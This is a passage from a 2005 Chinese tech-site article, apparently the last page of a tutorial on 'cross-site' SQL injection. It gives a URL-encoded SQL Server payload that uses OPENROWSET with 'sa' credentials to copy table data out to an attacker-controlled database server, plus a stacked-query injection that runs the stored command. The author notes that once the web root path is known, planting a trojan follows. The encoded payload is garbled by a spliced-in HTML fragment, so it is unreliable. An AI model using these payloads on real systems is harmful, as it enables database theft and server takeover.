跨站式SQL注入技巧-其它相关-中华E书网IT学院

E书首页 - 下载 - 范文 - IT - 秘书 - 专家 - 创业 - 健康 - 百科 - 电影 - 娱乐 - 写真 - 英语 - 技术 - BBS - BLOG

IT资讯 | 业界 | 互联网 | 通信 | 人物 | 数码 | 软件 | 硬件 | 游戏 | 技术百科 | 搜索引擎 | 操作系统

您现在的位置：中华E书网 >> IT学院 >> 网络安全 >> 其它相关 >> 正文

▎跨站式SQL注入技巧

跨站式SQL注入技巧

作者：佚名文章来源：EBOOK-CN.COM 更新时间：2005-12-4 22:47:49

F%75%74%70%75%74%20%69%6E%73%65%72%74%20%69%6E%74%6F%20%6C%61%6F%6B%61%69%20%28%63%68%61%38%29%20%76%61%6C%75%65%73%28%27%53%45%4C%45%43%54%20%61%2E%2A%20%46%52%4F%4D%20%4F%50%45%4E%52%4F%57%53%45%54%28%27%27%53%51%4C%4F%4C%45%44%42%27%27%2C%27%27%3F%3F%49%50%27%27%3B%27%27%73%61%27%27%3B%27%27%3F%3F%27%27%2C%20%27%27%53%45%4C%45%43%54%20%2A%20%46%52%4F%4D%20%70%75%62%73%2E%64%62%6F%2E%61%75%74%68%6F%72%73%20%77%68%65%72%65%20%61%75%5F%66%6E%61%6D%65%3d/33.shtml' target='_blank' class='article'>3D%27%27%27%27%27%20%2B%20%40%72%65%73%75%6C%74%20%2B%20%27%27%27%27%27%27%27%29%41%53%20%61%27%29%3B%2D%2D%20

　　执行成功。。。
　　a.asp?id=1;DECLARE @a1 char(255) set @a1=(SELECT cha8 FROM laokai) exec (@a1);--

　　网站那边显示还是正常页面。。但是你这边的事件探测器那边会显示:

　　

　　注入成功。。后边知道了绝对路径，如何添加木马的文章就很多了。。这里就不再描述了。。

　　最后说明一下：这只是一个新型的攻击思路的讲解，让大家通过另外一种方式把数据库里边的数据取出来。。

　　''SELECT * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''' 部分，修改成insert把数据加入数据库也应该没有问题。。甚至单独保留 @result 都没问题。。不过这样那边会出错。这边就留下一个exec 'C:\Inetpub,,1'

上一页 [1] [2] [3]

上一篇文章：全面解析“网络钓鱼”式攻击

下一篇文章：网站服务器通用和专用保护方法比较分析(1)

▎编辑推荐

▎最新热门

▎合作链接